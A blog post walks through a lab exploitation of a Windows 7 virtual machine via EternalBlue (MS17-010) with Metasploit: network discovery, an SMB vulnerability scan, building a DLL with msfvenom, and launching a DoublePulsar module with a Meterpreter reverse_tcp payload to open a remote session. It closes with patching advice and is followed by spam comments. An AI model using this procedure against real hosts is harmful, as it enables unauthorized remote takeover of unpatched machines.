EternalBlue Exploit at Windows 7 using Metasploit

eternalblue-exploit

Several months ago (and may be it’s still continuing), many windows hosts/computers had been infected and attacked by two major Ransomware. They are Wannacry and Petya/NonPetya. Refered to wired.co.uk,  The Ransowmware spread was helped by a Microsoft Windows security vulnerability called EternalBlue.

EternalBlue is an exploit generally believed to be developed by the U.S. National Security Agency (NSA). It was leaked by the Shadow Brokers hacker group on April 14, 2017, and was used as part of the worldwide WannaCry and Petya ransomware attack on May 12, 2017 and on June 27, 2017. Furthermore It was reported to be used as part of the Retefe banking trojan since at least September 5, 2017.

EternalBlue was caused by the vulnerability in Server Message Block version 1.0 at Microsoft. The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target computer.

In this post, I will show you the Proof of Concept how do the remote access to Windows 7 utilize the exploit using Metasploit. The eternalblue exploit that I used is found in Github through this link. This exploit is combination of two tools “Eternal Blue” which is use as backdooring in windows and “Doublepulsar” which is used for injecting dll file with the help of payload.  After I downloaded the exploit, there was a file named Eternal Blue-Doublepulsar.rb. Firstly, I had to copy manually this file to metasploit framework directory (usr/share/metasploit Framework /module/exploits/windows/smb).

I looked up the target machine in my local network using Netdiscover.

netdiscover

I found that the target machine was 192.168.100.7 (Vmware,Inc). Then I scanned the machine using nmap.

nmap port 445 eternalblue smb

Fortunately, the machine was really vulnerable for MS17-010 which is SMB Exploit of EternalBlue. After I believed certainly that the machine was vulnerable for EternalBlue, then I launched the exploit. The first, I injected a DLL file using msfvenom and ran the Postgresql service. My attacker machine was kali-linux3 whose the ip address was 192.168.100.8.

msfvenom

The I fired up the metasploit framework by launch msfconcole. And used the exploit at path exploit/windows/smb/eternalblue_doublepulsar.

From the picture above, there was several parameters which should be filled. The parameters were RHOST (the victim ip address), TARGETARCHITECTURE (the type of target machine core whether 32-bit or 64-bit). Then we should set a payload too. In this case I used payload of windows/meterpreter/reverse_tcp.

After all parameters had been set up, I launched the exploit. And fortunately the exploit was succeed to exploit the machine. It gave me an open session to fire up the machine.

meterpreter session

The important questions are how to protect our computer from this exploit. The answer is we should update and install the patches to our windows. The patches had been released by microsoft through this link.

Thus a small PoC from Sudokom, Hopely it can give you some benefit effects for securing your devices. Thanks.

4 thoughts on “EternalBlue Exploit at Windows 7 using Metasploit

  1. Hello ,

    I saw your tweets and thought I will check your website. Have to say it looks very good!
    I’m also interested in this topic and have recently started my journey as young entrepreneur.

    I’m also looking for the ways on how to promote my website. I have tried AdSense and Facebok Ads, however it is getting very expensive.
    Can you recommend something what works best for you?

    I also want to improve SEO of my website. Would appreciate, if you can have a quick look at my website and give me an advice what I should improve: http://janzac.com/
    (Recently I have added a new page about FutureNet and the way how users can make money on this social networking portal.)

    I wanted to subscribe to your newsletter, but I couldn’t find it. Do you have it?

    Hope to hear from you soon.

    P.S.
    Maybe I will add link to your website on my website and you will add link to my website on your website? It will improve SEO of our websites, right? What do you think?

    Regards
    Jan Zac

  2. I saw your tweets and thought I will check your website. Have to say it looks very good!
    I’m also interested in this topic and have recently started my journey as young entrepreneur.

    I’m also looking for the ways on how to promote my website. I have tried AdSense and Facebok Ads, however it is getting very expensive.
    Can you recommend something what works best for you?

Leave a Reply

Your email address will not be published. Required fields are marked *